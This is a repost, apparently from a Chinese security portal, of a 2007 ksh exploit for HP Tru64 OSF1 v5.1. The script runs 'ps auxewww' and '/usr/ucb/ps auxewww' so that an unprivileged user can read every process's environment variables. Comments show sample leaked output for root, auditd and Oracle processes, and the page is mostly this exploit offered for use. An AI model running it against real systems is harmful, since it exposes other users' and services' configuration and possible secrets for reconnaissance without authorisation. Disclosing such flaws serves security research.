首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 HP Tru64 Alpha OSF1 v5.1 (ps) Information Leak Exploit 来源：http://rawlab.mindcreations.com 作者：Andrea 发布时间：2007-02-07   #!/bin/ksh # # osf1tru64ps.ksh exploit # Tested on OSF1 V5.1 1885 alpha # # ps executable - information leak # # Author: Andrea "bunker" Purificato #         http://rawlab.mindcreations.com # # the "ps" command (also /usr/ucb/ps) on HP OSF1 v5.1 Alpha, # developed without an eye to security, allows unprivileged users to see # values of all processes environment variables. # # Useful during information discovery. # # fake_uname> uname -a           # OSF1 fake_uname V5.1 1885 alpha # # fake_uname> id # uid=301(fake_user) gid=216(fake_gid) # # fake_uname> /usr/ucb/ps auxeww # USER            PID %CPU %MEM   VSZ  RSS TTY      S    STARTED         TIME COMMAND # ... # ... # root        1038875  0.0  0.0 2.02M 184K ??       I    11:39:03     0:00.01 sleep 55 MANPATH=/usr/share/man:/usr/dt/share/man:/usr/local/man:/usr/opt/networker/man:/usr/local/openssh/bin PATH=/sbin:/bin:/usr/bin:/usr/sbin:/sbin:/bin:/usr/bin:/usr/sbin:/sbin:/usr/sbin:/usr/bin:/usr/ccs/bin:/usr/bin/X11:/usr/local:/usr/local/openssh/bin:/usr/opt/networker/bin LOGNAME=root USER=root SHELL=/bin/ksh HOME=/ TERM=vt100 PWD=/opt/AmosLite_Client... # ... # ... # root        1009950  0.0  0.0 2.73M 840K ??       I <    Sep 30     0:31.22 /usr/sbin/auditd -l /LOG_SOURCE/audit/auditlog HOME=/ LOGNAME=root MANPATH=/usr/share/man:/usr/dt/share/man:/usr/local/man:/usr/opt/networker/man:/usr/local/openssh/bin PATH=/sbin:/usr/sbin:/usr/bin:/usr/ccs/bin:/usr/bin/X11:/usr/local:/usr/local/openssh/bin:/usr/opt/networker/bin PWD=/var/audit SHELL=/bin/ksh TERM=xterm USER=root... # ... # ... # oracle       541177  0.0  0.0 28.2M 3.4M ??       S      Sep 01     0:07.00 /app/oracle/product/9.2.0/Apache/Apache/bin/httpd -d /app/oracle/product/9.2.0/Apache/Apache HOME=/app/oracle LD_LIBRARY_PATH=/app/oracle/product/9.2.0/lib:/app/oracle/product/9.2.0/lib:/app/oracle/product/9.2.0/obackup/lib: LOGNAME=oracle NLS_LANG=AMERICAN_AMERICA.WE8MSWIN1252 OBK_HOME=/app/oracle/product/9.2.0/obackup ORACLE_BACKUP=/app/oracle/BACKUP ORACLE_BASE=/app/oracle ORACLE_DOC=/app/oracle/product/9.2.0/oradoc ORACLE_HOME=/app/oracle/product/9.2.0 ORACLE_PATH=/app/oracle/product/9.2.0/oracle ORACLE_SID=... # ... # ... # echo "Tru64 Alpha OSF1 V5.1 1885  - ps information leak" echo "Andrea \"bunker\" Purificato - http://rawlab.mindcreations.com" echo "" echo "Default ps executable: " ps auxewww echo "/usr/ucb/ps executable: " /usr/ucb/ps auxewww   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Oracle 9i/10g DBMS_EXPORT_EXTE ·FlashFXP 3.4.0 build 1145 Remo ·MS Internet Explorer 6 (mshtml ·SmartFTP Client 2.0.1002 Remot ·GGCMS <= 1.1.0 RC1 Remote Code ·Categories hierarchy phpBB Mod ·阿里巴巴支付宝远程代码执行漏洞 ·Imail 8.10-8.12 (RCPT TO) Remo ·Imail 8.10-8.12 (RCPT TO) Remo ·Advanced Poll <= 2.0.5-dev Rem ·Woltlab Burning Board Lite <= ·Site-Assistant <= v0990 (paths   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved